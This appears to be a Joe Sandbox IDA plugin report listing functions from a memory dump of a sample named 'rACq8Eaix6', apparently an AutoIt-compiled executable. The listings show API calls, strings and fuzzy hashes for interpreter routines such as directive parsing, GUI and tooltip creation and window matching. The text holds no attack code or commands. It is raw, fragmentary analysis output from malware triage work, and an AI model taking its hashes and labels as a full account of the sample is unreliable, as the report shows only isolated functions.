Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 32e7272cc7eaf3e650960808c38b34a71c398220021af14a11dc49b0ec4412bd
Instruction ID: 8db75b8c58659d457fb6aadfb6c56fa6fdc3120f93d6647324e24c848686d5ff
Opcode Fuzzy Hash: 32e7272cc7eaf3e650960808c38b34a71c398220021af14a11dc49b0ec4412bd
Instruction Fuzzy Hash: 7251D1B4664205AB8B14EB91CD82CBDB3A0EF4C704F604166E483A76D0DA309E66EB57

Function 00BD68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00BD6931
__wcsnicmp.LIBCMT ref: 00BD6949
__wcsnicmp.LIBCMT ref: 00BD6961
__wcsnicmp.LIBCMT ref: 00BD6979
__wcsnicmp.LIBCMT ref: 00BD6991
__wcsnicmp.LIBCMT ref: 00BD69A9
__wcsnicmp.LIBCMT ref: 00BD69C1
__wcsnicmp.LIBCMT ref: 00BD69D5
__wcsnicmp.LIBCMT ref: 00BD6A16
__wcsnicmp.LIBCMT ref: 00BD6A2A
__wcsnicmp.LIBCMT ref: 00BD6A3E
__wcsnicmp.LIBCMT ref: 00BD6A52

Strings

#include, xrefs: 00BD69A3
#include-once, xrefs: 00BD698B
#notrayicon, xrefs: 00BD6943
#cs, xrefs: 00BD69CF, 00BD6A24
Cannot parse #include, xrefs: 00C0E3F0
Unterminated group of comments, xrefs: 00C0E403
Bad directive syntax error, xrefs: 00C0E31A
#ce, xrefs: 00BD6A4C
#OnAutoItStartRegister, xrefs: 00BD6973
#comments-start, xrefs: 00BD69BB, 00BD6A10
#requireadmin, xrefs: 00BD695B
#pragma compile, xrefs: 00BD692B
#comments-end, xrefs: 00BD6A38

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: b602e129e2f5949e302cab8a7e33cb2457176470396206e6d9b92ed2635459c7
Instruction ID: 33e176026ff008c631d29970cb2a06933715ae0d7c806564fe5e362ee53cd6e9
Opcode Fuzzy Hash: b602e129e2f5949e302cab8a7e33cb2457176470396206e6d9b92ed2635459c7
Instruction Fuzzy Hash: 4681E8B1640219AACB24BA60DC92FBAB7E8EF05740F0440B6FD456B2D2FB60DE49D651

Function 00C59A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00C59AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00C59B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00C59BA7

Strings

0, xrefs: 00C59BE4

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 7420254e9db86d22d756836166ee401c6e0225c2562fec9b3382419007f1c0a5
Instruction ID: 85097efc0c5c774bc9ef66b182dc9313afec0c191b476ade4f4e85c559cb0165
Opcode Fuzzy Hash: 7420254e9db86d22d756836166ee401c6e0225c2562fec9b3382419007f1c0a5
Instruction Fuzzy Hash: 0502F038104301EFD725CF15C849BAABBE4FF49312F0446ADF8A9D62A1C774DA88CB56

Function 00C5A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00C5A903
SetTextColor.GDI32(?,?), ref: 00C5A907
GetSysColorBrush.USER32(0000000F), ref: 00C5A91D
GetSysColor.USER32(0000000F), ref: 00C5A928
CreateSolidBrush.GDI32(?), ref: 00C5A92D
GetSysColor.USER32(00000011), ref: 00C5A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C5A953
SelectObject.GDI32(?,00000000), ref: 00C5A964
SetBkColor.GDI32(?,00000000), ref: 00C5A96D
SelectObject.GDI32(?,?), ref: 00C5A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 00C5A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C5A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00C5A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C5A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C5AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 00C5AA32
DrawFocusRect.USER32(?,?), ref: 00C5AA3D
GetSysColor.USER32(00000011), ref: 00C5AA4B
SetTextColor.GDI32(?,00000000), ref: 00C5AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00C5AA67
SelectObject.GDI32(?,00C5A5FA), ref: 00C5AA7E
DeleteObject.GDI32(?), ref: 00C5AA89
SelectObject.GDI32(?,?), ref: 00C5AA8F
DeleteObject.GDI32(?), ref: 00C5AA94
SetTextColor.GDI32(?,?), ref: 00C5AA9A
SetBkColor.GDI32(?,?), ref: 00C5AAA4

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 4b8543a4293ba499f77d33b4902284c1e4a2dbba6f6dac3ef566f551a77db7e0
Instruction ID: 14676b6c64c0a78f65ed8a62915ac5aa83402c6de77184704ffb5813fbe3bd22
Opcode Fuzzy Hash: 4b8543a4293ba499f77d33b4902284c1e4a2dbba6f6dac3ef566f551a77db7e0
Instruction Fuzzy Hash: C9515D75900218EFDB149FA5DC48FAE7BB9EB08321F114229F911BB2A1D7719A81DF90

Function 00C589D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C58AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C58AD2
CharNextW.USER32(0000014E), ref: 00C58B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C58B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C58B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C58B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00C58B86
SetWindowTextW.USER32(?,0000014E), ref: 00C58BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00C58BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C58C1F
_memset.LIBCMT ref: 00C58C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00C58C8D
_memset.LIBCMT ref: 00C58CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C58D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00C58D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00C58E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00C58E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C58E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C58EB4
DrawMenuBar.USER32(?), ref: 00C58EC3
SetWindowTextW.USER32(?,0000014E), ref: 00C58EEB

Strings

0, xrefs: 00C58E55

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 75065e0220b792b1452c1118a1153d511d5a14a31b555bd3e0310d585cb762ae
Instruction ID: 3e5c0a435c0045f288c5f55a9610fe81186883b362df28804bb2696cb4ff7b7c
Opcode Fuzzy Hash: 75065e0220b792b1452c1118a1153d511d5a14a31b555bd3e0310d585cb762ae
Instruction Fuzzy Hash: 6AE15078900208EBDB209F55CC84AEE7BB9EB09711F10415AFD25BA191DB709AC9DF64

Function 00C5488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00C549CA
GetDesktopWindow.USER32 ref: 00C549DF
GetWindowRect.USER32(00000000), ref: 00C549E6
GetWindowLongW.USER32(?,000000F0), ref: 00C54A48
DestroyWindow.USER32(?), ref: 00C54A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C54A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C54ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00C54AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00C54AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00C54B09
IsWindowVisible.USER32(?), ref: 00C54B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00C54B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00C54B58
GetWindowRect.USER32(?,?), ref: 00C54B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00C54B96
GetMonitorInfoW.USER32(00000000,?), ref: 00C54BB0
CopyRect.USER32(?,?), ref: 00C54BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00C54C32

Strings

0, xrefs: 00C54975
(, xrefs: 00C54BA3
tooltips_class32, xrefs: 00C54A96

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 266d4b5a65bbf4c22f17262574e9219a4a25f453d13e3fa8db466763c011f47a
Instruction ID: 1be5794349c64330ef17764f0a2219781f7f47065ecca6c96bfd66f3976c6e45
Opcode Fuzzy Hash: 266d4b5a65bbf4c22f17262574e9219a4a25f453d13e3fa8db466763c011f47a
Instruction Fuzzy Hash: EAB18B74604340AFDB08DF64C845B6ABBE4FF84305F00891DF999AB2A1DB71ED89CB59

Function 00C3449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C344AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C344D2
_wcscpy.LIBCMT ref: 00C34500
_wcscmp.LIBCMT ref: 00C3450B
_wcscat.LIBCMT ref: 00C34521
_wcsstr.LIBCMT ref: 00C3452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C34548
_wcscat.LIBCMT ref: 00C34591
_wcscat.LIBCMT ref: 00C34598
_wcsncpy.LIBCMT ref: 00C345C3

Strings

\VarFileInfo\Translation, xrefs: 00C34540
%u.%u.%u.%u, xrefs: 00C34626
04090000, xrefs: 00C3457E
StringFileInfo\, xrefs: 00C3451B
DefaultLangCodepage, xrefs: 00C345AB

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 5b5758ba3566ab284cf5bd137a9a3a63f8b9f2b129cf456eaa912ad786ed93d9
Instruction ID: 3380ab44bc499f648e22c60cae50c05ef77f4f77538871aec239a0ccd3255929
Opcode Fuzzy Hash: 5b5758ba3566ab284cf5bd137a9a3a63f8b9f2b129cf456eaa912ad786ed93d9
Instruction Fuzzy Hash: BC41F575A502087BDB14BB748C07EBF77ECDF45710F0000BAFA05E7192EB74AA0996A9

Function 00BD27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BD28BC
GetSystemMetrics.USER32(00000007), ref: 00BD28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BD28EF
GetSystemMetrics.USER32(00000008), ref: 00BD28F7
GetSystemMetrics.USER32(00000004), ref: 00BD291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BD2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BD2949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BD297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BD2990
GetClientRect.USER32(00000000,000000FF), ref: 00BD29AE
GetStockObject.GDI32(00000011), ref: 00BD29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00BD29D5

Part of subcall function 00BD2344: GetCursorPos.USER32(?), ref: 00BD2357
Part of subcall function 00BD2344: ScreenToClient.USER32(00C957B0,?), ref: 00BD2374
Part of subcall function 00BD2344: GetAsyncKeyState.USER32(00000001), ref: 00BD2399
Part of subcall function 00BD2344: GetAsyncKeyState.USER32(00000002), ref: 00BD23A7

SetTimer.USER32(00000000,00000000,00000028,00BD1256), ref: 00BD29FC

Strings

AutoIt v3 GUI, xrefs: 00BD2974

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: e03336dc5061b7e0eb25f479fba5a46c02417537c97046e767cee5962ed3c332
Instruction ID: a1637f82c47e6e7dd2602b24a849e868ff7a2b1d35880d26890f476652b8b973
Opcode Fuzzy Hash: e03336dc5061b7e0eb25f479fba5a46c02417537c97046e767cee5962ed3c332
Instruction Fuzzy Hash: 1DB17F75A0024ADFDB15DFA8DC89BAEBBF4FB18311F10422AFA15A72D0DB749941CB50

Function 00C2A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00C2A47A
__swprintf.LIBCMT ref: 00C2A51B
_wcscmp.LIBCMT ref: 00C2A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C2A583
_wcscmp.LIBCMT ref: 00C2A5BF
GetClassNameW.USER32(?,?,00000400), ref: 00C2A5F6
GetDlgCtrlID.USER32(?), ref: 00C2A648
GetWindowRect.USER32(?,?), ref: 00C2A67E
GetParent.USER32(?), ref: 00C2A69C
ScreenToClient.USER32(00000000), ref: 00C2A6A3
GetClassNameW.USER32(?,?,00000100), ref: 00C2A71D
_wcscmp.LIBCMT ref: 00C2A731
GetWindowTextW.USER32(?,?,00000400), ref: 00C2A757
_wcscmp.LIBCMT ref: 00C2A76B

Part of subcall function 00BF362C: _iswctype.LIBCMT ref: 00BF3634

Strings

%s%u, xrefs: 00C2A515

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 0db348ce2795a9384a5512f184ea331027b84675547265d67c22972507e6494d
Instruction ID: 4d4886544e33d8a730b840d28c0c0cfe3ca3e31299010144f00caa5f44bbb563
Opcode Fuzzy Hash: 0db348ce2795a9384a5512f184ea331027b84675547265d67c22972507e6494d
Instruction Fuzzy Hash: 43A1F271204726BFD718DF60D884FAAB7E8FF44714F008529F9A9D2590DB30EA46CB92

Function 00C2AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00C2AF18
_wcscmp.LIBCMT ref: 00C2AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 00C2AF51
CharUpperBuffW.USER32(?,00000000), ref: 00C2AF6E
_wcscmp.LIBCMT ref: 00C2AF8C
_wcsstr.LIBCMT ref: 00C2AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00C2AFD5
_wcscmp.LIBCMT ref: 00C2AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 00C2B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 00C2B055
_wcscmp.LIBCMT ref: 00C2B065
GetClassNameW.USER32(00000010,?,00000400), ref: 00C2B08D
GetWindowRect.USER32(00000004,?), ref: 00C2B0F6

Strings

@, xrefs: 00C2AEF9
ThumbnailClass, xrefs: 00C2AFE0, 00C2B060

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: e243a0aecd55088a30e025bf179342b4799a7beb50d634d1759c415c3b85e7ae
Instruction ID: eb2b0a65ee55609431dde820d0057ab141e1f02303f5672f1d3d294467fdc0a7
Opcode Fuzzy Hash: e243a0aecd55088a30e025bf179342b4799a7beb50d634d1759c415c3b85e7ae
Instruction Fuzzy Hash: D381E0710083199FDB05DF10D985FBABBE8EF44714F04846AFD959A092DB34DE89CB61

Function 00C2ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00C2AC33

Strings

ACTIVE, xrefs: 00C2AC0E
LAST, xrefs: 00C2ABF8
CLASSNAME=, xrefs: 00C2AC70
REGEXP=, xrefs: 00C2AC48
[HANDLE:, xrefs: 00C2AC3F
[ALL, xrefs: 00C2ACD9
[ACTIVE, xrefs: 00C2AC20
[LAST, xrefs: 00C2ACE0
ALL, xrefs: 00C2ACC7
[REGEXPTITLE:, xrefs: 00C2AC5B
[CLASS:, xrefs: 00C2AC83
HANDLE=, xrefs: 00C2AC2C

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 93c0113a666224514d83d7328361f266b770a1c2b40e95fbfd615e56b3a1fd95
Instruction ID: 215ae79d506f6547e4aaf11b5bd276aa28c7217c7ce98d15e9d734912475074f
Opcode Fuzzy Hash: 93c0113a666224514d83d7328361f266b770a1c2b40e95fbfd615e56b3a1fd95
Instruction Fuzzy Hash: D831D230548219ABCA14FA60EE53EFEB7E49B10B54F3001AAB411715D1FE62AF049656

Function 00C44FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00C45013
LoadCursorW.USER32(00000000,00007F00), ref: 00C4501E
LoadCursorW.USER32(00000000,00007F03), ref: 00C45029
LoadCursorW.USER32(00000000,00007F8B), ref: 00C45034
LoadCursorW.USER32(00000000,00007F01), ref: 00C4503F
LoadCursorW.USER32(00000000,00007F81), ref: 00C4504A
LoadCursorW.USER32(00000000,00007F88), ref: 00C45055
LoadCursorW.USER32(00000000,00007F80), ref: 00C45060
LoadCursorW.USER32(00000000,00007F86), ref: 00C4506B
LoadCursorW.USER32(00000000,00007F83), ref: 00C45076
LoadCursorW.USER32(00000000,00007F85), ref: 00C45081
LoadCursorW.USER32(00000000,00007F82), ref: 00C4508C
LoadCursorW.USER32(00000000,00007F84), ref: 00C45097
LoadCursorW.USER32(00000000,00007F04), ref: 00C450A2
LoadCursorW.USER32(00000000,00007F02), ref: 00C450AD
LoadCursorW.USER32(00000000,00007F89), ref: 00C450B8
GetCursorInfo.USER32(?), ref: 00C450C8

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 95c69143ebe33999248d7fb5e98443820a944f9ae7fbefa1b8b1824d0772baa2
Instruction ID: a91e3993b3556c5e33f0cb2f1f9119ca9b49540461ca822a7aa6495d215ba366
Opcode Fuzzy Hash: 95c69143ebe33999248d7fb5e98443820a944f9ae7fbefa1b8b1824d0772baa2
Instruction Fuzzy Hash: B03114B1D083196BDF109FB68C8995FBFE8FF08750F50452AA51CE7281DA7965008F91

Function 00C5A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C5A259
DestroyWindow.USER32(?,?), ref: 00C5A2D3

Part of subcall function 00BD7BCC: _memmove.LIBCMT ref: 00BD7C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C5A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C5A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C5A382
DestroyWindow.USER32(00000000), ref: 00C5A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BD0000,00000000), ref: 00C5A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C5A3F4
GetDesktopWindow.USER32 ref: 00C5A40D
GetWindowRect.USER32(00000000), ref: 00C5A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C5A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C5A444

Part of subcall function 00BD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BD25EC

Strings

0, xrefs: 00C5A26F
tooltips_class32, xrefs: 00C5A346, 00C5A3D4
